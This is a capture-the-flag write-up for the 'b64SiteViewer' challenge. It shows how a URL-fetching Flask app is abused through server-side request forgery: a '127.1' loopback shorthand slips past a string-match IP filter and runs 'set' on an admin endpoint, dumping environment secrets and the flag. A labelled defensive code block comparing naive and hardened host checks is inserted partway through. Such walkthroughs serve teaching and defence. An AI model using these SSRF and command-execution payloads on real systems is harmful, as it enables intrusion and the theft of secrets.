# IRON CTF 2024 - b64SiteViewer
**Title:** b64SiteViewer
**Description:** Hey everyone, check out my new Base64 site viewer! The admin believes he's invincible. Do you have what it takes to outsmart him?
Flag Format: ironCTF{alphanumeric_lowercase}
`https://b64siteviewer.1nf1n1ty.team/`:
![image](https://hackmd.io/_uploads/r1zeNHekkg.png)
**Files:**
```bash
chall
├── app.py
├── flag.sh
├── requirements.txt
└── templates
    └── home.html
```
## Solution:
First, I examined the given `app.py` Flask application for weaknesses that could be used to reach the flag. The application has two main routes. The home route (`/`) fetches a URL supplied by the user and shows the base64-encoded content of the response.
The `/admin` route executes shell commands passed via the `cmd` parameter. To prevent unauthorized access, it gates execution on the client IP address:
```python
from flask import Flask, request, render_template_string
import subprocess

app = Flask(__name__)

@app.route('/admin')
def admin():
    # Source-address gate: only these two literal strings are accepted
    if request.remote_addr in ['127.0.0.1', 'localhost']:
        cmd = request.args.get('cmd', 'id')
        # Command blacklist (the real list is redacted in the challenge source)
        if any(blacklisted in cmd for blacklisted in ['REDACTED', "'", '"']):
            return render_template_string('Command blocked')
        print(f"Executing: {cmd}")
        result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
        return result.stdout
    return render_template_string("Don't hack me")
```
This filter is meant to restrict command execution to requests originating from the server itself (i.e., localhost).
The IP filter only matches the literal strings `127.0.0.1` and `localhost`. It doesn't account for alternative IPv4 spellings such as `127.1`, which is technically the same address as `127.0.0.1`: the whole `127.0.0.0/8` range is loopback, and the address parser expands the shorthand `127.1` to `127.0.0.1`. So `127.1` still reaches the loopback interface, but that string isn't caught by the filter.
To exploit this oversight, I crafted a request to the `/admin` route using `127.1` as the hostname, bypassing the IP filter:
```bash
http://127.1:5000/admin?cmd=set
```
Here's a breakdown of the payload:
1. **Bypassing the IP filter:** `127.1` isn't in the blocked list but still points to localhost, so the IP check passes.
2. **Executing the command:** the `cmd` parameter is set to `set`, which prints the shell's variables, including environment variables that may hold sensitive data such as the flag.
Submitting the URL `http://127.1:5000/admin?cmd=set` to the site viewer returned this response:
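Added example, not part of the original writeup or the challenge code: the string-match filter from the challenge placed beside a hardened check that resolves the supplied host and inspects the resulting addresses, so the `127.1` shorthand above is caught. The function names (`naive_is_blocked`, `resolve_host`, `hardened_is_blocked`) are my own; resolving `localhost` relies on the local hosts file, and no request is ever sent to the addresses tested.

```python
import ipaddress
import socket

# Filter in the spirit of the challenge: exact string comparison only.
NAIVE_BLOCKLIST = ['127.0.0.1', 'localhost']


def naive_is_blocked(host: str) -> bool:
    return host in NAIVE_BLOCKLIST


def resolve_host(host: str) -> list:
    """Return every address `host` can denote, as ipaddress objects.

    Numeric shorthand such as 127.1 is expanded the way the OS resolver
    expands it (inet_aton semantics), so the check below compares
    addresses rather than the string the client chose to write.
    """
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return []
    addrs = set()
    for _family, _type, _proto, _canon, sockaddr in infos:
        addr = ipaddress.ip_address(sockaddr[0])
        # ::ffff:a.b.c.d is an IPv4 address in IPv6 clothing
        if addr.version == 6 and addr.ipv4_mapped is not None:
            addr = addr.ipv4_mapped
        addrs.add(addr)
    return sorted(addrs, key=str)


def hardened_is_blocked(host: str) -> bool:
    """Block unless *every* resolved address is globally routable.

    Loopback, private, link-local and unspecified addresses all fail
    is_global; an unresolvable name is blocked too (fail closed).
    """
    addrs = resolve_host(host)
    if not addrs:
        return True
    return any(not a.is_global for a in addrs)


if __name__ == '__main__':
    # 8.8.8.8 is used only as a well-known globally routable address.
    for host in ['127.0.0.1', 'localhost', '127.1', '::1', '8.8.8.8']:
        print(f"{host:10} naive={naive_is_blocked(host)!s:5} "
              f"hardened={hardened_is_blocked(host)}")
```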
```bash
base64 version of the site: b'SUZTPScgCQonCkxDX0NUWVBFPSdDLlVURi04JwpPTERQV0Q9Jy8nCk9QVElORD0nMScKUEFUSD0nL3Vzci9sb2NhbC9zYmluOi91c3IvbG9jYWwvYmluOi91c3Ivc2JpbjovdXNyL2Jpbjovc2JpbjovYmluJwpQUElEPScyJwpQUzE9JyQgJwpQUzI9Jz4gJwpQUzQ9JysgJwpQV0Q9Jy9ob21lL3VzZXInClNITFZMPScxJwpXRVJLWkVVR19TRVJWRVJfRkQ9JzMnCl89Jy91c3IvbG9jYWwvYmluL3B5dGhvbicKZmxhZz0naXJvbkNURnt5MHU0cjNyMGNrMW42azMzcGg0Y2sxbjZ9Jwo='
```
I decoded it, and here’s what I received:
```bash
IFS='
'
LC_CTYPE='C.UTF-8'
OLDPWD='/'
OPTIND='1'
PATH='/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin'
PPID='2'
PS1='$ '
PS2='> '
PS4='+ '
PWD='/home/user'
SHLVL='1'
WERKZEUG_SERVER_FD='3'
_='/usr/local/bin/python'
flag='ironCTF{y0u4r3r0ck1n6k33ph4ck1n6}'
```
And there's our flag: `ironCTF{y0u4r3r0ck1n6k33ph4ck1n6}`